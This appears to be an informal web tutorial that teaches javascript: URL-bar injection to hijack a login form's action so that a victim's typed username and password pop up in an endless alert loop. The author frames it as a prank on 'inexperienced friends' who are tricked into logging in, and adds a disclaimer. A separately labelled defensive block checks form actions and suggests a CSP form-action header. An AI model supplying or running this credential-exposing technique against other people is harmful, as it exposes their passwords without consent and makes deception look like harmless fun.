
Basic Hacking: Javascript Injection Prank

Password Prank Javascript Injection

First things first, test it out. In the URL bar, type the following:

javascript:alert("hello")

"Oh my god, it said hello to me." Now try something like this:

javascript:document.write("hello")

"Oh my word, a new page that says hello to me." Don't worry, this is going somewhere. Now for some variables:

javascript:void(a="hello"); javascript:alert(a)

If you're starting to understand the concept, you'll realize that something's different: we set a variable named a and then alerted the value of a.

Now here's where it gets more advanced. Go to a page with a login form, like gmail.com, and type this into the URL bar:

javascript:alert(document.forms[0].action)

document is the object that represents the page you're on. With forms[0] you're asking for the form (a type of HTML tag, for those who don't know) at index 0 (the first one on the page), and action is where the form submits to.

Now what would happen if we changed this value through a void? Try it:

javascript:void(document.forms[0].action="http://www.google.com"); javascript:alert(document.forms[0].action)

Oh wow, it changed, but what does that mean? Try clicking the log in button. There ya go. So it just sends me to Google, big deal. Keep reading, the payoff is coming.

So now try this: put something in the username box and something else in the password box (these will be coming up in a popup, so don't put your real information if anyone's around).

javascript:alert(document.forms[0].elements[0].value)

Like before, forms[0] gives you the first form, but now elements[0].value gives you what the first element contains. So, to accomplish our goal, change elements[0].value to elements[1].value, then elements[2].value, and so on until you find what you put in the username box and what you put in the password box.

Now, before we continue, one last thing you need to learn. (Warning: this will freeze your browser; opening a different window is recommended.)

javascript:while(1) alert("loop")

while is basically a loop. It has other uses, but in while(1) the 1 is treated as true, so while(1) generates a never-ending loop.

And now for the final product. Remember, this can be done for any site with a form submission login (most sites). If you're using gmail.com like me, you'll find the two you're looking for are elements[7].value and elements[8].value. And now to put all I've shown you together:

javascript:void(document.forms[0].action="javascript:while(1) alert(document.forms[0].elements[7].value+' '+document.forms[0].elements[8].value)")

Now look what happens when you try logging in: "OH MY GOD THAT'S MY USERNAME AND PASSWORD"

This method can be used for any website that has a form submission login (most sites), but not all sites have exactly the same values, so you may need to tweak forms[0], elements[7] and elements[8] to something different depending on the site. You should be able to figure it out, though.
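
Everything above works by changing where a form submits, so a page can check the action at submit time. The following is an added example, not part of the original tutorial; classifyFormAction, guardForms and the example.test URLs are hypothetical names made up for illustration.

```javascript
// Added example: classify a form's action before the form is submitted.
// classifyFormAction and guardForms are hypothetical names.
function classifyFormAction(action, pageUrl, allowedOrigins = []) {
  const page = new URL(pageUrl);
  let target;
  try {
    // An empty action submits to the page itself; relative ones resolve against it.
    target = new URL(action || pageUrl, pageUrl);
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  // javascript:, data: and similar schemes are never a real submit endpoint.
  if (target.protocol !== "https:" && target.protocol !== "http:") {
    return { ok: false, reason: "scheme " + target.protocol };
  }
  // Credentials must not leave an HTTPS page over plain HTTP.
  if (page.protocol === "https:" && target.protocol === "http:") {
    return { ok: false, reason: "downgrade" };
  }
  if (target.origin !== page.origin && !allowedOrigins.includes(target.origin)) {
    return { ok: false, reason: "origin " + target.origin };
  }
  return { ok: true, reason: "ok" };
}

// Browser wiring (assumption: runs in the page before any form is used).
// getAttribute is used because an input named "action" shadows form.action.
function guardForms(doc, pageUrl, allowedOrigins) {
  doc.addEventListener("submit", (ev) => {
    const verdict = classifyFormAction(
      ev.target.getAttribute("action"), pageUrl, allowedOrigins);
    if (!verdict.ok) {
      ev.preventDefault();
      console.warn("form submit blocked:", verdict.reason);
    }
  }, true); // capture phase, so it runs before handlers on the form itself
}

// Constructed sample values, checked against a made-up login page URL.
const PAGE = "https://example.test/signin";
for (const action of ["/session", "http://www.google.com",
                      "javascript:while(1) alert('x')"]) {
  console.log(action, "->", classifyFormAction(action, PAGE).reason);
}
```

Script running in the same page can remove this listener, so treat a blocked submit as a tamper signal rather than a hard boundary. A `Content-Security-Policy: form-action 'self'` response header has the browser enforce the same origin restriction from outside the page's script.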

Now, this is meant as a prank, and only to be used with good, inexperienced friends.

For example, open up the site, put the injection in, and ask one of your friends to log in because you sent them something or you want to see their profile.
Password pops up, doesn't go away, everyone gets a good laugh.

I do not condone malicious hacking, this is only proof of theory, I will not be held accountable for what you use this knowledge for, yada yada I better not get in trouble yada yada. Have fun.

Sources: Erm, I made the script and this tutorial myself, and over the past year I've picked up random javascript on my own, so basically anything you might find on google: "javascript injections" can go here.
